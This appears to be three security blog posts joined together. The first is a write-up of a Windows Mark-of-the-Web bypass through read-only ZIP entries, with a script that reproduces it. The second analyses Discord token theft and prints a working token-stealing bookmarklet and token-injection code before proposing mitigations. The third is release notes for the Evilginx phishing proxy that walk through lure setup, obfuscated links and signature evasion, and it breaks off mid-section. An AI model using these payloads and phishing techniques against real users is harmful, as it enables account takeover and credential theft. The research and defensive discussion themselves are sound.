This sounded to me like a nice challenge to freshen up my rusty RE skills. The bug was also a 0-day at the time: it had already been reported to Microsoft, but no fix had been deployed for more than 90 days.

What I always find the most interesting about vulnerability research write-ups is the process of how the bug was found, what tools were used, and what approach was taken. I wanted this post to be like that.

Now that the vulnerability has been fixed, I can freely publish the details.

Background

What I found out, based on public information about the bug and demo videos, was that Windows, somehow, does not append MOTW to files extracted from ZIP files.

Mark-of-the-web is really another file attached as an Alternate Data Stream (ADS), named Zone.Identifier, and it is only available on NTFS filesystems. The ADS file always contains the same content:

[ZoneTransfer]
ZoneId=3

For example, when you download a ZIP file file.zip, from the Internet, the browser will automatically add file.zip:Zone.Identifier ADS to it, with the above contents, to indicate that the file has been downloaded from the Internet and that Windows needs to warn the user of any risks involving this file's execution.
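On Windows/NTFS you can inspect or create this ADS yourself; a minimal Python sketch (the filename is just an example, and this only works on NTFS under Windows):

# ADS are addressed with the "file:stream" syntax on NTFS (Windows only).
motw = "[ZoneTransfer]\r\nZoneId=3\r\n"

with open(r"file.zip:Zone.Identifier", "w", newline="") as ads:
    ads.write(motw)

print(open(r"file.zip:Zone.Identifier").read())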

This is what happens when you try to execute something like a JScript file stored in a ZIP file with MOTW attached, by double-clicking it.

[Screenshot: MOTW security warning popup]

Clearly the user would think twice before opening it when such a popup shows up. This is not the case, though, for specially crafted ZIP files bypassing that feature.

Let's find the cause of the bug.

Identifying the culprit

What I knew already from my observation is that the bug was triggered when the explorer.exe process handles the extraction of ZIP files. I figured the process must be using some internal Windows library for handling ZIP file unpacking, and I was not mistaken.

[Screenshot: ProcessHacker showing zipfldr.dll loaded in the Explorer process]

ProcessHacker revealed the zipfldr.dll module loaded within the Explorer process, and it looked like a good starting point. I booted up IDA, with symbols conveniently provided by Microsoft, to look around.

The ExtractFromZipToFile function immediately caught my attention. I created a sample ZIP file with a packaged JScript file, for testing, which had a single instruction:

WScript.Echo("YOU GOT HACKED!!1");

I then added a MOTW ADS file with Notepad and filled it with MOTW contents, mentioned above:

notepad file.zip:Zone.Identifier

I loaded up the x64dbg debugger, attached it to explorer.exe, and set up a breakpoint on ExtractFromZipToFile. When I double-clicked the JS file, the breakpoint triggered and I could confirm I was on the right path.

CheckUnZippedFile

One of the function calls I noticed nearby revealed an interesting pattern in IDA. Right after the file is extracted and specific conditions are met, the CheckUnZippedFile function is called, followed by a call to _OpenExplorerTempFile, which opens the extracted file.

[Screenshot: the CheckUnZippedFile / _OpenExplorerTempFile call flow in IDA]

Having a hunch that CheckUnZippedFile is the function responsible for adding MOTW to the extracted file, I nopped its call and found that I stopped getting the MOTW warning popup when I tried executing a JScript file from within the ZIP.

It was clear to me that if I managed to manipulate the execution flow in such a way that the branch executing this function is skipped, I would be able to achieve the desired effect of bypassing the creation of MOTW on extracted files. I looked into the function to investigate further.

I noticed that CheckUnZippedFile tries to combine the TEMP folder path with the zipped file’s filename, extracted from the ZIP file, and when this combination fails, the function quits, skipping the creation of the MOTW file.

[Screenshot: CheckUnZippedFile disassembly]

Considering that I controlled the filename of the extracted ZIP file, I could possibly manipulate its content to trigger PathCombineW to fail and as a result achieve my goal.

PathCombineW turned out to be a wrapper around the PathCchCombineExW function, with the output buffer size limit set to a fixed value of 260 characters (MAX_PATH). I thought that if I managed to create a really long filename, or use some special characters which would be ignored by the function handling the file extraction but would trigger the length check in CheckUnZippedFile to fail, it could work.

I opened 010 Editor, which I highly recommend for any kind of hex editing work, and opened my sample ZIP file with a built-in ZIP template.

[Screenshot: the sample ZIP opened with 010 Editor’s built-in ZIP template]

I spent a few hours testing different filename lengths and different special characters, just to see if the extraction function would behave in an erratic way. Unfortunately I found out that there was another path length check, performed prior to the one I had been investigating. It triggered much earlier and prevented me from exploiting this one specific check. I had to start over and consider this path a dead end.

I looked at whether there were any controllable branching conditions that would result in not triggering the call to CheckUnZippedFile at all, but none of them seemed to depend on any of the internal ZIP file parameters. I then looked deeper into the CheckUnZippedFile function and found that when the PathCombineW call succeeds, it creates a CAttachmentServices COM object, which has three of its methods called:

CAttachmentServices::SetReferrer(unsigned short const * __ptr64)
CAttachmentServices::SetSource(unsigned short const * __ptr64)
CAttachmentServices::SaveWithUI(struct HWND__ * __ptr64)

I realized I was about to go deep down a rabbit hole, and I might spend much longer there than a hobby project like this should require. I had to get a public exploit sample to speed things up.

Huge thanks to @bohops & @bufalloveflow for all the help in getting the sample!

Detonating the live sample

I managed to copy over all relevant ZIP file parameters from the obtained exploit sample into my test sample, and I confirmed that MOTW was gone when I extracted the sample JScript file.

I decided to dig deeper into the SaveWithUI COM method to find the exact place where the creation of the Zone.Identifier ADS fails. Navigating through shdocvw.dll, I ended up in urlmon.dll with a failing call to WritePrivateProfileStringW.

[Screenshot: the failing WritePrivateProfileStringW call in urlmon.dll]

This is the Windows API function for handling the creation of INI configuration files. Considering that the Zone.Identifier ADS file is an INI file containing a ZoneTransfer section, it was definitely relevant. I dug deeper.

The search led me to the final call of NtCreateFile, trying to create the Zone.Identifier ADS file, which failed with an ACCESS_DENIED error when using the exploit sample and succeeded when using the original, untampered test sample.

[Screenshot: NtCreateFile call parameters in the debugger]

It looked like the majority of parameters were constant, as you can see on the screenshot above. The only place where I’d expect anything dynamic was in the structure of the ObjectAttributes parameter. After closer inspection and half an hour of closely comparing the contents of the parameter structures from the two calls, I concluded that both the failing and the succeeding calls use exactly the same parameters.

This led me to realize that something had to be happening prior to the creation of the ADS file, which I had not accounted for. There was no better way to figure that out than to use Process Monitor, which honestly I should’ve used long before I even opened IDA 😛.

Backtracking

I set up my filters to only list file operations related to files extracted to the TEMP directory, starting with the Temp prefix.

[Screenshot: Process Monitor filters]

The test sample clearly succeeded in creating the Zone.Identifier ADS file:

[Screenshot: Zone.Identifier ADS created for the test sample]

While the exploit sample failed:

[Screenshot: Zone.Identifier ADS creation failing for the exploit sample]

Through comparison of these two listings, I could not clearly see any drastic differences. I exported the results as text files and compared them in a text editor. That's when I could finally spot it.

Prior to creating the Zone.Identifier ADS file, a call to SetBasicInformationFile was made with FileAttributes set to RN.

[Screenshot: SetBasicInformationFile called with FileAttributes RN]

I looked up what that R attribute was, which apparently is not set when extracting from the original test sample, and then...

[Image: Facepalm]

The R file attribute stands for read-only. The file stored in the ZIP has the read-only attribute set, and it is also set on the file extracted from the ZIP. Obviously, when Windows tries to attach the Zone.Identifier ADS to it, it fails, because the file has the read-only attribute and any write operation on it will fail with an ACCESS_DENIED error.

It doesn't even seem to be a bug, since everything is working as expected 😛. The file attributes in a ZIP file are set in ExternalAttributes parameter of the ZIPDIRENTRY structure and its value corresponds to the ones, which carried over from MS-DOS times, as stated in ZIP file format documentation I found online.

   4.4.15 external file attributes: (4 bytes)

       The mapping of the external attributes is
       host-system dependent (see 'version made by').  For
       MS-DOS, the low order byte is the MS-DOS directory
       attribute byte.  If input came from standard input, this
       field is set to zero.

   4.4.2 version made by (2 bytes)

        4.4.2.1 The upper byte indicates the compatibility of the file
        attribute information.  If the external file attributes 
        are compatible with MS-DOS and can be read by PKZIP for 
        DOS version 2.04g then this value will be zero.  If these 
        attributes are not compatible, then this value will 
        identify the host system on which the attributes are 
        compatible.  Software can use this information to determine
        the line record format for text files etc.  

        4.4.2.2 The current mappings are:

         0 - MS-DOS and OS/2 (FAT / VFAT / FAT32 file systems)
         1 - Amiga                     2 - OpenVMS
         3 - UNIX                      4 - VM/CMS
         5 - Atari ST                  6 - OS/2 H.P.F.S.
         7 - Macintosh                 8 - Z-System
         9 - CP/M                     10 - Windows NTFS
        11 - MVS (OS/390 - Z/OS)      12 - VSE
        13 - Acorn Risc               14 - VFAT
        15 - alternate MVS            16 - BeOS
        17 - Tandem                   18 - OS/400
        19 - OS X (Darwin)            20 thru 255 - unused

        4.4.2.3 The lower byte indicates the ZIP specification version 
        (the version of this document) supported by the software 
        used to encode the file.  The value/10 indicates the major 
        version number, and the value mod 10 is the minor version 
        number.  

Changing the value of the external attributes to anything with the lowest bit set, e.g. 0x21 or 0x01, effectively makes the extracted file read-only, and Windows is then unable to create MOTW for it after extraction.
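To see the effect for yourself, the read-only bit can be set on every entry of an archive with a few lines of Python (the filenames are just examples; use this only on your own test files, as it reproduces behavior Microsoft has since patched):

import zipfile

# Rewrite an archive, setting the MS-DOS read-only bit (0x01) in each
# entry's external attributes.
with zipfile.ZipFile("original.zip") as src, \
     zipfile.ZipFile("readonly.zip", "w") as dst:
    for info in src.infolist():
        info.external_attr |= 0x01   # DOS R (read-only) attribute
        dst.writestr(info, src.read(info.filename))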

Conclusion

I honestly expected the bug to be much more complicated, and I definitely shot myself in the foot by getting too excited and starting up IDA instead of running Process Monitor first. I started with IDA as I didn’t have an exploit sample in the beginning and was hoping to find the bug through code analysis. Bottom line, I managed to learn something new about Windows internals and how the extraction of ZIP files is handled.

As a bonus, Mitja Kolsek from 0patch asked me to confirm if their patch worked and I was happy to confirm that it did!

Nice work. Care to verify that our micropatches fix this? (A free 0patch account suffices.) https://t.co/us8FVWczXk

— Mitja Kolsek (@mkolsek) November 1, 2022

The patch was clean and reliable as seen in the screenshot from a debugger:

[Screenshot: debugger view confirming the 0patch micropatch]

I've been also able to have a nice chat with Will Dormann, who initially discovered this bug, and his story on how he found it is hilarious:

I merely wanted to demonstrate how an exploit in a ZIP was safer (by way of prompting the user) than that *same* exploit in an ISO.  So how did I make the ZIP?  I:
1) Dragged the files out of the mounted ISO
2) Zipped them. That's it.  The ZIP contents behaved the same as the ISO.

Every mounted ISO image lists all files in read-only mode. Dragging and dropping files from a read-only partition to a different one preserves the read-only attribute on the created files. This is how Will managed to unknowingly trigger the bug.

Will also made me realize that the 7zip extractor, even though its developers announced they had begun adding MOTW to every file extracted from a MOTW-marked archive, does not add MOTW by default; this feature has to be enabled manually.

[Screenshots: 7zip’s MOTW propagation setting]

I mention it as it may explain why MOTW is not always considered a valid security boundary. Vulnerabilities related to it may be given low priority and even be ignored by Microsoft for 90 days.

When 7zip announced support for MOTW in June, I honestly took it for granted that it would be enabled by default, but apparently the developer doesn’t know exactly what he is doing.

I haven't yet analyzed how the patch made by Microsoft works, but do let me know if you did and I will gladly update this post with additional information.

Hope you enjoyed the write-up!

Hacked Discord - Bookmarklet Strikes Back


For the past couple of months, I’ve been hearing about increasing numbers of account takeover attacks in the Discord community. Discord has somehow become a de facto official messenger application among the cryptocurrency community, with new channels oriented around NFTs popping up like mushrooms.

Hacking Discord accounts has suddenly become a very lucrative business for cybercriminals, who are going in for the kill, to make some easy money. They take over admin accounts in cryptocurrency-oriented communities to spread malware and launch further social engineering attacks. My focus is going to be purely on Discord account security, which should be of concern to everyone using Discord.

In recent weeks I thought the attackers were using some new reverse-proxy phishing techniques to hijack WebSocket sessions, with tools similar to Evilginx, but in reality the hacks, I discovered, are much easier to execute than I anticipated.

In this post I will be explaining how the attacks work, what everyone can do to protect themselves and more importantly what Discord can do to mitigate such attacks.

Please bear in mind that this post covers my personal point of view on how I feel the mitigations should be implemented and I am well aware that some of you may have much better ideas. I encourage you to contact me @mrgretzky or at [email protected] if you feel I missed anything or was mistaken.

Criticism is welcomed!

The Master Key

When you log in to your Discord account, either by entering your account credentials on the login screen or by scanning a QR code with your Discord mobile app, Discord will send you your account token, in the form of a string of data.

This token is the only key required to access your Discord account.

From now on I will refer to that token as the master token, since it works like a master key for your Discord account. That single line of text, consisting of around 70 characters, is what the attackers are after. When they manage to extract the master token from your account, it is game over: third parties can freely access your account, bypassing both the login screen and any multi-factor authentication you may have set up.

Now that we know what the attackers are after, let's analyze the attack flow.

Deception Tactics

Attacker's main goal is to convince you in any way possible to reveal your account token, with the most likely approach being social engineering. First, attackers will create a story to set themselves up as a people you can trust, who will resolve your pressing issue, like unban your account on a Discord channel or elevate your community status.

There is a hack/scam(bypasses 2fa) that scammers are using to compromise discord accounts. If you are a project founder/admin, this is IMPORTANT.

Our server just got attacked.

Here's how, a🧵

— Little Lemon Friends (@LittlelemonsNFT) January 3, 2022

In this thread you can read how attackers managed to convince the target to do a screen share from their computer with Chrome DevTools open on the side. DevTools allowed them to extract the master token by revealing the contents of Discord’s LocalStorage.

Discord now purposefully renames the window.localStorage object when it loads, to make it inaccessible to injected JavaScript. It also hides the token variable, containing the master token’s value, from the storage. This was done to prevent attackers from stealing master tokens by convincing targets to open LocalStorage through screen share.

Discord also shows a pretty warning, informing users about the risks of pasting unknown code into the DevTools console.

[Screenshot: Discord’s warning in the DevTools console]

The renaming of the localStorage object and the concealment of the token variable did not fix the issue. Attackers figured out they could force the Discord window to reload and then retrieve the data before the implemented mitigations are executed.

This is exactly how the most recent bookmarklet attack works. Attackers convince their victim to bookmark JavaScript code in their bookmarks tab and later trick them into clicking the saved bookmark, with the Discord app in focus, to execute the attacker’s malicious code.

Attacker's code retrieves the victim's Discord master token and sends it to the attacker.

[Screenshot: what the saved malicious bookmarklet would look like]

The malicious JavaScript to access the master token looks like this:

javascript:(function(){location.reload();var i = document.createElement('iframe');document.body.appendChild(i);alert(i.contentWindow.localStorage.token)})()

To try it out, open the Discord website, go to the console tab in Chrome DevTools (Control+Shift+I) and paste this code into it, which is something you should never do when asked 😉. After you press Enter, you should see a popup box with your master token value in it.

Attackers will exfiltrate the token through Discord WebHooks. This is done to bypass the current Content Security Policy rules, as the discord.com domain is obviously allowed to be connected to from the Discord client.

Most users have no idea that saved bookmarks can run malicious JavaScript in the context of the website they are currently viewing. This is why this type of attack may be successful even among security-savvy users.

Another, much harder approach the attackers can take is deploying malware onto the target’s computer. Once you install malware on your PC, the consequences can be far greater than just losing your Discord account. Just to note here: the browser’s LocalStorage stores the tokens in unencrypted form.

LocalStorage database files for Chrome reside in:

%LOCALAPPDATA%\Google\Chrome\User Data\<PROFILE>\Local Storage\leveldb\
Discord master token found inside one of the LocalStorage database files

Once the attacker retrieves your Discord master token, they can inject it into their own browser's LocalStorage under the token variable name. This can easily be done using the LocalStorage Manager extension for Chrome.
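
Without an extension, the same iframe trick from the bookmarklet could be used to write the stolen value. A rough sketch of mine; the exact stored format may differ (the value may be JSON-quoted):

// Run with the Discord tab open in the attacker's own browser:
var i = document.createElement('iframe');
document.body.appendChild(i);
i.contentWindow.localStorage.setItem('token', '"<stolen master token>"'); // quotes may be required
location.reload(); // Discord picks the token up on reload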

On reload, Discord will detect the valid token in its LocalStorage and grant full control over the hijacked account. All of this is possible even with multi-factor authentication enabled on the hijacked account.

Proposed Mitigations

The fact that a single token, accessible through JavaScript, lets you impersonate and fully control another user's account is what makes the bookmarklet attack possible.

The attacker needs to execute their malicious JavaScript in the context of the user's Discord session. This can happen either through exploitation of an XSS vulnerability or by tricking the user into bookmarking and clicking the JavaScript bookmarklet.

There is unfortunately no definitive fix for this problem, but there are definitely ways to increase the costs for attackers and make the attacks much harder to execute.

Store Token as an HttpOnly Cookie

Modern web services rely heavily on communication with REST APIs, and Discord is no different. To conform with the standard, REST APIs must implement a stateless architecture, meaning that each request from the client to the server must contain all of the information necessary to understand and complete the request.

The session token included with requests to a REST API is usually embedded within the Authorization HTTP header. We can see that the Discord app does it the same way:

Master token sent via Authorization HTTP header

For the web application to be able to include the session token within the Authorization header or request body, the token value itself must be accessible through JavaScript. A token accessible through JavaScript will always be vulnerable to XSS bugs or other JavaScript injection attacks (like bookmarklets).
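
To illustrate, here is a sketch of how a typical SPA attaches such a token; the endpoint is a real Discord API path, but the surrounding code is mine, not Discord's client code:

// The token lives in a JS-readable variable, so any injected script can read it.
var token = '<master token value>'; // in Discord's case, read from LocalStorage
fetch('https://discord.com/api/v9/users/@me', {
  headers: { 'Authorization': token } // Discord sends the raw token in this header
}).then(function (res) { return res.json(); })
  .then(function (me) { console.log(me.username); });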

Some people may not agree with me, but I think that critical authorization tokens should be handled through cookie storage, inaccessible to JavaScript. Server-side support for the Authorization header can also be allowed, but it should be optional. For reasons unknown to me, the majority of REST API developers ignore token authorization via cookies altogether.

The server should send the authorization session token value as a cookie with the HttpOnly flag, in the Set-Cookie HTTP header.

Storing the session token in the browser as a cookie with the HttpOnly flag makes sure that it can never be retrieved from JavaScript code. The session token will be automatically sent with every HTTP request to the domains the cookie was set up for.
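
A hypothetical example of what such a header could look like (the attribute choices here are mine, not taken from Discord):

Set-Cookie: token=<session_token_value>; Domain=.discord.com; Path=/; Secure; HttpOnly; SameSite=Lax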

A request which sends the authentication token as a cookie could look like this:

How Discord may be sending the session token via cookies, instead of Authorization header

I've noticed that Discord's functionality does not rely solely on interaction with its API; a major part of it is handled through WebSocket connections.

The WebSocket connection is established with the gateway.discord.gg endpoint, instead of the main discord.com domain.

Discord initiating a WebSocket connection

If the session token cookie was delivered in a response to a request made to the discord.com domain, it would not be possible to set a cookie for the discord.gg domain, due to browser security boundaries.

To counter that, Discord would either need to implement smart routing that lets Discord clients use WebSocket connections through the discord.com domain, or it would have to implement authorization against the discord.gg endpoint using a one-time token once the user successfully logs in, having discord.gg return a valid session token as a cookie for its own domain.

Right now Discord permits anyone to establish a WebSocket connection with gateway.discord.gg, and the authorization token is validated during the internal exchange of WebSocket messages.

This means that the session token is also required during WebSocket communication, increasing its reliance on being accessible through JavaScript. This brings me to another mitigation that can be implemented.

Ephemeral Session Tokens

Making it a strict requirement for tokens to be delivered as HttpOnly cookies will never work. There needs to be some way to keep authorization tokens accessible to JavaScript without giving the attacker all the keys to the castle once such a token gets compromised.

That's why I'd make authentication reliant on two types of tokens:

  1. An authentication token stored only as a cookie with the HttpOnly flag, used to authenticate with the REST API and to initiate a WebSocket connection.
  2. A session token generated dynamically with a short expiration time (a few hours), accompanied by a refresh token used for creating new session tokens. Session tokens would be used only in internal WebSocket communication, and WebSocket connections would be allowed only after presenting a valid authentication token as a cookie.
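
A minimal sketch of how the client side of this scheme could look; every endpoint name here is hypothetical:

// The HttpOnly authentication cookie rides along automatically; JavaScript
// only ever sees the short-lived session token used for WebSocket messages.
async function getSessionToken() {
  const res = await fetch('https://discord.com/api/session-token', { // hypothetical endpoint
    method: 'POST',
    credentials: 'include' // attaches the HttpOnly authentication cookie
  });
  const { sessionToken, expiresIn } = await res.json();
  // refresh before expiresIn elapses, using the accompanying refresh token
  return sessionToken;
}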

If you wish to learn more about ephemeral session tokens and refresh tokens, I recommend this post.

But wait! The attacker controls the session anyway!

Before you yell at me that all of these mitigations are futile, because the attacker's injected JavaScript is already able to fully impersonate and control the hacked user's session, hear me out.

@buherator and I exchanged opinions about possible mitigations and he made a good point:

I don't see how this would make a difference. The app needs to maintain long term sessions, thus the attacker in control of the app can have them too (if she can't achive her goal in millis). Having to request new tokens periodically is an implementation nuance.

— buherator (@buherator) August 27, 2022

In short: the attacker is able to inject their own JavaScript, which will run in the context of the Discord app. Running malicious code in the context of Discord allows the attacker to make any request to the Discord API with all required security tokens attached. This also includes cookies stored with the HttpOnly flag, since the attacker's requests can have them included automatically, with withCredentials set to true:

// Injected code runs in the Discord app's context, so the browser attaches
// the session cookies (HttpOnly ones included) automatically.
var req = new XMLHttpRequest();
req.open("GET", "https://discord.com/api/v9/do_something", true); // hypothetical endpoint
req.withCredentials = true; // ensure cookies are included (matters for cross-origin requests)
req.send(null);
How an attacker could make HTTP requests to the Discord API with valid authentication cookies.

No matter how well the tokens are protected, the Discord client needs access to all of them, which means an attacker executing code in the context of the app will be able to forge valid client requests, potentially changing the user's settings or sending spam messages to subscribed channels.

I've been thinking about it for a few days and reached the conclusion that implementing the mitigations I mentioned would still be worth it. At the moment the attack is extremely easy to pull off, which is what makes it so dangerous. The ability to forge requests impersonating a target user is not as bad as being able to completely recreate the victim's session within a Discord client remotely.

With the token cookie protected by the HttpOnly flag, the attacker will only be able to use the token to perform actions impersonating the hacked user; they will never be able to exfiltrate the token's value in order to inject it into their own browser.

In my opinion this would still vastly lower the severity of the attack and force attackers to increase its technical complexity, requiring knowledge of the Discord API to perform their tasks once the user's session is hijacked.

Another thing to note here is that the attacker would remain in charge of the user's hijacked session only until the Discord app is closed or reloaded. They would not be able to spawn their own session to freely impersonate the hacked user at any time they want. Currently, the stolen master token gives the attacker lifetime access to the victim's account; the token is invalidated and recreated only when the user changes their password.

Takeaways

It is important to note that the attackers are only able to exfiltrate the master token value, using XMLHttpRequest and Discord's WebHooks, by sending it to Discord channels they control. Using WebHooks allows them to comply with Discord's Content Security Policy.

If it weren't for WebHooks, attackers would have to figure out another way to exfiltrate the stolen tokens. At the time of writing this article, the connect-src CSP rules for discord.com, which tell the browser which domains the Discord app is allowed to connect to, are as follows:

connect-src 'self' https://discordapp.com https://discord.com https://connect.facebook.net https://api.greenhouse.io https://api.github.com https://sentry.io https://www.google-analytics.com https://hackerone-api.discord.workers.dev https://*.hcaptcha.com https://hcaptcha.com https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location ws://127.0.0.1:* http://127.0.0.1:*;

There seem to be other allowed services, like the GitHub API, Sentry or Google Analytics, which could also be used to exfiltrate the tokens.

I'm not sure if the Discord client needs access to WebHooks through XMLHttpRequest, but if it doesn't, it may have been a better choice for Discord to host the WebHook handlers on a different domain than discord.com and control access to them with additional CSP rules.

There is also one question which remains unanswered:

Should web browsers still support bookmarklets?

As asked by @zh4ck in his tweet, which triggered my initial curiosity about the attacks.

Bookmarklets were useful in the days when it was convenient to click them to spawn an HTML popup for quickly sharing the URL on social media. These days I'm not sure if anyone still needs them.

I have no idea if letting bookmarks start with javascript: is needed anymore, but it can easily become one of those legacy features that will keep coming back to haunt us.

Wrap-up

I hope you liked the post and that it managed to teach you something.

I am constantly looking for interesting projects to work on. If you think my skills may be of help to you, do reach out through the contact page.

Until next time!


Evilginx 2.4 - Gone Phishing

Welcome back everyone! I expect you are all quite hungry for Evilginx updates! I am happy to announce that the tool is still kicking.

It's been a while since I released the last update. This blog tells me that version 2.3 was released on January 18th, 2019. One and a half years is enough to collect some dust.

I'll make sure the wait was worth it.

First of all, I want to thank you all for your invaluable support over these past years. I've learned that many of you are using Evilginx on assessments and that it is providing you with results. Such feedback always warms my heart and pushes me to expand the project. It was an amazing experience to learn how you are using the tool and what direction you would like it to expand in. There were some great ideas in your feedback, and this update was partially released to address them.

I'd like to give out some honorable mentions to people who provided some quality contributions and who made this update happen:

>> GET EVILGINX HERE <<


Special Thanks!

Julio @juliocesarfort - For constantly proving to me and himself that the tool works (sometimes even too well)!

OJ Reeves @TheColonial - For being a constant source of great Australian positive energy and feedback, and for always being a humble, wholesome and awesome guy! Check out OJ's live hacking streams on Twitch.tv and pray you're not matched against him in Rocket League!

pry @pry0cc - For pouring me many cups of great ideas, which resulted in great solutions! Also check out his great tool axiom!

Jason Lang @curiousjack - For being able to bend Evilginx to his will and, in turn, giving me ideas on what features were missing and needed.

@an0nud4y - For sending that PR with amazingly well done phishlets, which inspired me to get back to Evilginx development.

Pepe Berba - For his incredible research and development of a custom version of the LastPass harvester! I still need to implement this incredible idea in future updates.

Aidan Holland @thehappydinoa - For spending his free time creating these super helpful demo videos and helping keep things in order on Github.

Luke Turvey @TurvSec - For featuring Evilginx and creating high-quality tutorial hacking videos on his Youtube channel.

So, again - thank you very much, and I hope this tool stays relevant to your work for years to come and brings you lots of pwnage! Just remember to let me know via Twitter DM that you are using it, and about any ideas you have on how to expand it further!

Here is the list of upcoming changes:

2.4.0

  • Feature: Create and set up pre-phish HTML templates for your campaigns. Create your HTML file and place {lure_url_html} or {lure_url_js} in code to manage redirection to the phishing page with any form of user interaction. Command: lures edit <id> template <template>
  • Feature: Create customized hostnames for every phishing lure. Command: lures edit <id> hostname <hostname>.
  • Feature: Support for routing connection via SOCKS5 and HTTP(S) proxies. Command: proxy.
  • Feature: IP blacklist with automated IP address blacklisting and blocking on all or unauthorized requests. Command: blacklist
  • Feature: Custom parameters can now be embedded encrypted in the phishing url. Command: lures get-url <id> param1=value1 param2="value2 with spaces".
  • Feature: Requests to phishing urls can now be rejected if User-Agent of the visitor doesn't match the whitelist regular expression filter for given lure. Command: lures edit <id> ua_filter <regexp>
  • List of custom parameters can now be imported directly from file (text, csv, json). Command: lures get-url <id> import <params_file>.
  • Generated phishing urls can now be exported to file (text, csv, json). Command: lures get-url <id> import <params_file> export <export_file> <text|csv|json>.
  • Fixed: Requesting LetsEncrypt certificates multiple times without restarting. Subsequent requests would result in "No embedded JWK in JWS header" error.
  • Removed setting custom parameters in lures options. Parameters will now only be sent encoded with the phishing url.
  • Added with_params option to sub_filter allowing to enable the sub_filter only when specific parameter was set with the phishing url.
  • Made command help screen easier to read.
  • Improved autofill for lures edit commands and switched positions of <id> and the variable name.
  • Increased the duration of whitelisting authorized connections for whole IP address from 15 seconds to 10 minutes.

I'll explain the most prominent new features coming in this update, starting with the most important feature of them all.

Pre-phish HTML Templates

First of all, let's focus on what happens when an Evilginx phishing link is clicked. Evilginx verifies that the URL path corresponds to a valid existing lure and immediately shows the proxied login page of the targeted website.

If that link is sent out onto the internet, every web scanner can start analyzing it right away and eventually, if they do their job, they will identify and flag the phishing page.

Pre-phish HTML templates add another step before the redirection to the phishing page takes place. You can create your own HTML page, which will show up before anything else. On this page, you can decide how the visitor will be redirected to the phishing page.

One idea would be to show a "Loading" page with a spinner and have the page wait for 5 seconds before redirecting to the destination phishing page. Another would be to combine it with some social engineering narrative, showing the visitor a modal dialog of a file shared with them, where the redirection happens after the visitor clicks the "Download" button.

Pre-phish page requiring the visitor to click the download button before being redirected to the phishing page.

Every HTML template supports customizable variables, whose values can be delivered embedded within the phishing link (more info on that below).

There are also two variables which Evilginx will fill out on its own. These are:

{lure_url}: This will be substituted with an unquoted URL of the phishing page. This one is to be used inside your HTML code. Example output: https://your.phish.domain/path/to/phish

{lure_url_js}: This will be substituted with an obfuscated, quoted URL of the phishing page. The obfuscation is randomized with every page load. This one is to be used inside your Javascript code. Example output:

'h' + 't' + 'tp' + 's:/' + '/' + 'c' + 'hec' + 'k.' + 't' + 'his' + '.ou' + 't' + '.fa' + 'k' + 'e' + '.' + 'co' + 'm' + '/se' + 'cur' + 'it' + 'y/' + 'c' + 'hec' + 'k?' + 'C' + '=g' + '3' + 'Ct' + 'p' + 'sA'

The first variable can be used with <a href=...> HTML tags like so:

<a href="{lure_url}">Click here</a>

While the second one should be used with your Javascript code:

window.location.assign({lure_url_js});

If you want to use values coming from custom parameters, which will be delivered embedded with the phishing URL, put placeholders in your template with the parameter name surrounded by curly brackets: {parameter_name}

You can check out one of the sample HTML templates I released here: download_example.html

HTML source code of example template

Once you create your HTML template, you need to set it for any lure of your choosing. Remember to put your template file in the /templates directory in the root Evilginx directory; if you keep it somewhere else, run Evilginx with the -t <templates_path> command line argument to specify the templates directory location.

Set up templates for your lures using this command in Evilginx:

lures edit <id> template <template_name>

Custom Parameters in Phishing Links

In previous versions of Evilginx, you could set up custom parameters for every created lure. This didn't work well at all, as you could only provide custom parameters hardcoded for one specific lure: the parameter values were stored in the database, assigned to the lure ID, and were not dynamically delivered.

This changes with this version. Storing custom parameter values in lures has been removed and replaced with attaching custom parameters during phishing link generation. This allows for dynamic customization of parameters depending on who will receive the generated phishing link.

In the example template mentioned above, there are two custom parameter placeholders used. You can specify {from_name} and {filename} to display a message about who shared a file, and the name of the file itself, which will be visible on the download button.

To generate a phishing link using these custom parameters, you'd do the following:

lures get-url 0 from_name="Ronald Rump" filename="Annual Salary Report.xlsx"

Remember - quoting values is only required if you want to include spaces in parameter values. You can also escape quotes with \ e.g. variable1=with\"quote.

This will generate a link, which may look like this:

https://onedrive.live.fake.com/download/912381236/Annual_Salary_Report.xlsx?vLT=hvQzgP8bXoSOWvfYKkd5aMsvRgsLEXqL6_4SX3VYI95Jji1JPUnPDNmQUnsdSW9hPbpESDausLz2ckLb6MBT

As you can see, both custom parameter values were embedded into a single GET parameter. The parameter name is randomly generated and its value consists of a random RC4 encryption key, a checksum and a base64-encoded encrypted value of all embedded custom parameters. This ensures that the generated link is different every time, making it hard to write static detection signatures for. There is also a simple checksum mechanism, which invalidates the delivered custom parameters if the link ever gets corrupted in transit.

Don't forget that custom parameters specified during phishing link generation will also apply to variable placeholders in your js_inject injected Javascript scripts in your phishlets.

It is important to note that you can change the name of the GET parameter which holds the encrypted custom parameters. You can also add your own GET parameters to make the URL look however you want. Evilginx is smart enough to go through all GET parameters and find the one it can decrypt and load custom parameters from.

For example if you wanted to modify the URL generated above, it could look like this:

https://onedrive.live.fake.com/download/912381236/Annual_Salary_Report.xlsx?token=hvQzgP8bXoSOWvfYKkd5aMsvRgsLEXqL6_4SX3VYI95Jji1JPUnPDNmQUnsdSW9hPbpESDausLz2ckLb6MBT&region=en-US&date=20200907&something=totally_irrelevant_get_parameter

Generating phishing links one by one is all fun until you need 200 of them, each requiring a different set of custom parameters. Thankfully, this update has got you covered.

You can now import custom parameters from a file in text, CSV or JSON format, and also export the generated links to text, CSV or JSON. You can also just print them on the screen if you want.

Importing custom parameters from file to generate three phishing links

Custom parameters to be imported in text format look the same way as you would type them after the lures get-url command in the Evilginx interface:

[email protected] name="Katelyn Wells"
[email protected] name="George Doh" delay=5000
[email protected] name="John Cena"
params.txt

If you wanted to use CSV format:

email,name,delay
[email protected],"Katelyn Wells",
[email protected],"George Doh",5000
[email protected]il.com,"John Cena",
params.csv

And lastly JSON:

[
	{
		"email":"[email protected]",
		"name":"Katelyn Wells"
	},
	{
		"email":"[email protected]",
		"name":"George Doh",
		"delay":"5000"
	},
	{
		"email":"[email protected]",
		"name":"John Cena"
	}
]
params.json

For import files, make sure the filename has an extension matching the data format you've decided to use: .txt for text, .csv for CSV and .json for JSON.

Generating phishing links by importing custom parameters from file can be done as easily as:

lures get-url <id> import <import_file>

Now if you also want to export the generated phishing links, you can do it with export parameter:

lures get-url <id> import <import_file> export <export_file> <text|csv|json>

The last command parameter selects the output file format.

Custom Hostnames for Phishing Links

